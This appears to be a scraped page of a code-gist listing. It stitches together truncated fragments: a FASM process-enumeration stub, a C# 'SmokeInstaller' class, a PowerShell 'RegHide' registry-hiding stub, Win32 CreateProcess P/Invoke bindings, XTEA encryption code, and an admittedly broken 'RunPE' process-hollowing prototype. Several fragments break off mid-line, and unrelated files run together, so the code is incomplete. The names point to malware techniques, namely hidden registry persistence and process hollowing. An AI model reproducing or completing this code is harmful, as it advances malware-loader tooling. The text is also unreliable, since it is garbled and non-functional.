
format PE GUI 4.0
entry main
include 'FS/INCLUDE/win32ax.inc'
struct PROCESSENTRY32
dwSize dd ?
cntUsage dd ?
th32ProcessID dd ?
th32DefaultHeapID dd ?
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Security.Principal;
namespace Reborn
{
internal class SmokeInstaller
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
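/// <summary>
/// P/Invoke binding for the Win32 <c>CreateProcess</c> function in kernel32.dll,
/// declared here with an extended startup block (<c>STARTUPINFOEX</c>).
/// </summary>
/// <remarks>
/// <para>
/// <c>SetLastError = true</c> makes the runtime capture the Win32 error code right after
/// the call, so <c>Marshal.GetLastWin32Error()</c> is reliable when this returns <c>false</c>.
/// Without it the value can be overwritten by the runtime's own native calls, and failed
/// process launches end up logged with a misleading error code.
/// </para>
/// <para>
/// No <c>CharSet</c> is given, so the default (ANSI) string marshaling applies.
/// NOTE(review): the layout of <c>STARTUPINFOEX</c> is declared elsewhere; confirm its string
/// fields are marshaled with the same character set before changing <c>CharSet</c> here.
/// </para>
/// <para>
/// Per the Win32 documentation, passing a <c>STARTUPINFOEX</c> requires the
/// <c>EXTENDED_STARTUPINFO_PRESENT</c> creation flag and a correctly sized <c>cb</c> field.
/// </para>
/// </remarks>
/// <param name="lpApplicationName">Module to execute; may be null when the command line names it.</param>
/// <param name="lpCommandLine">Command line for the new process.</param>
/// <param name="lpProcessAttributes">Security attributes for the new process handle.</param>
/// <param name="lpThreadAttributes">Security attributes for the new primary thread handle.</param>
/// <param name="bInheritHandles">
/// When true, every inheritable handle of the caller is duplicated into the child.
/// Pass false unless the child needs them, so privileged handles are not leaked into it.
/// </param>
/// <param name="dwCreationFlags">Process creation flags.</param>
/// <param name="lpEnvironment">Pointer to an environment block, or <c>IntPtr.Zero</c> to inherit the caller's.</param>
/// <param name="lpCurrentDirectory">Working directory for the new process, or null to inherit the caller's.</param>
/// <param name="lpStartupInfo">Extended startup information passed by reference.</param>
/// <param name="lpProcessInformation">
/// Receives the process and thread handles and ids. The caller owns both handles and must close them.
/// </param>
/// <returns>True on success; false on failure, with the error available via <c>Marshal.GetLastWin32Error()</c>.</returns>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);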
/// <summary>
/// P/Invoke binding for the Win32 <c>CreateProcessWithLogonW</c> function in advapi32.dll,
/// which starts a process under the credentials supplied in the arguments.
/// </summary>
/// <remarks>
/// Strings are marshaled as UTF-16 (<c>CharSet.Unicode</c>) and the Win32 error code is captured
/// (<c>SetLastError = true</c>), so <c>Marshal.GetLastWin32Error()</c> is valid after a false return.
/// NOTE(review): <paramref name="password"/> is a managed <c>string</c>, so the cleartext credential
/// stays in process memory until it is garbage collected and cannot be zeroed by the caller.
/// NOTE(review): <paramref name="environment"/> maps to the native <c>LPVOID lpEnvironment</c>, which is
/// pointer-sized. Declared as <c>uint</c>, only 0 (inherit) is safe in a 64-bit process; <c>IntPtr</c>
/// would be the matching type, but changing it alters the signature callers compile against.
/// </remarks>
/// <param name="username">Account name to log on with.</param>
/// <param name="domain">Domain or server holding the account.</param>
/// <param name="password">Cleartext password for the account.</param>
/// <param name="logonFlags">Logon options.</param>
/// <param name="applicationName">Module to execute.</param>
/// <param name="commandLine">Command line for the new process.</param>
/// <param name="creationFlags">Process creation flags.</param>
/// <param name="environment">Environment block pointer; see the remarks on its declared width.</param>
/// <param name="currentDirectory">Working directory for the new process.</param>
/// <param name="startupInfo">Startup information passed by reference.</param>
/// <param name="processInformation">
/// Receives the process and thread handles and ids. The caller owns both handles and must close them.
/// </param>
/// <returns>True on success; false on failure.</returns>
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessWithLogonW(string username, string domain, string password, LogonFlags logonFlags, string applicationName, string commandLine, CreationFlags creationFlags, uint environment, string currentDirectory, ref STARTUPINFO startupInfo, out PROCESS_INFORMATION processInformation);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool CreateProcessAsUser(IntPtr hToken, string lpApplicationName, string lpCommandLine, ref SECUR
using System;
using System.IO;
using System.Text;
namespace InfectedBytes.Security {
/// <summary>
/// Implementation of the "eXtended Tiny Encryption Algorithm".
/// XTEA is a block cipher designed to correct weaknesses in TEA.
/// It is a 64-bit block Feistel cipher with a 128-bit key and suggested 64 rounds.
//
// Authors:
// Miguel de Icaza (miguel@novell.com)
//
// See the following url for documentation:
// http://www.mono-project.com/Mono_DataConvert
//
// Compilation Options:
// MONO_DATACONVERTER_PUBLIC:
// Makes the class public instead of the default internal.
static public unsafe double DoubleFromLE (byte[] data, int index)
{
if (data == null)
throw new ArgumentNullException ("data");
if (data.Length - index < 8)
throw new ArgumentException ("index");
if (index < 0)
throw new ArgumentException ("index");
double ret;
public class ReflectionService
{
private static readonly log4net.ILog logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);
public static object CreateIstance(string _type)
{
object _serviceIstance = null;
try
{
foreach(var assembly in AppDomain.CurrentDomain.GetAssemblies())
decay88 / XTEA.cs
Created September 26, 2019 14:41 — forked from InfectedBytes/XTEA.cs
XTEA encryption for C#
/*
* Helper class for XTEA en/decryption of arbitrary data.
*
* Copyright (c) 2017, Henrik Heine
*/
using System;
using System.IO;
using System.Text;
decay88 / RunPE_x86_prototype.cs
Created September 2, 2019 15:50
x86 RunPE prototype (not working atm)
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
namespace ConsoleApp61
{
// something is wrong with this runpe
// probably has to do with the context
// not sure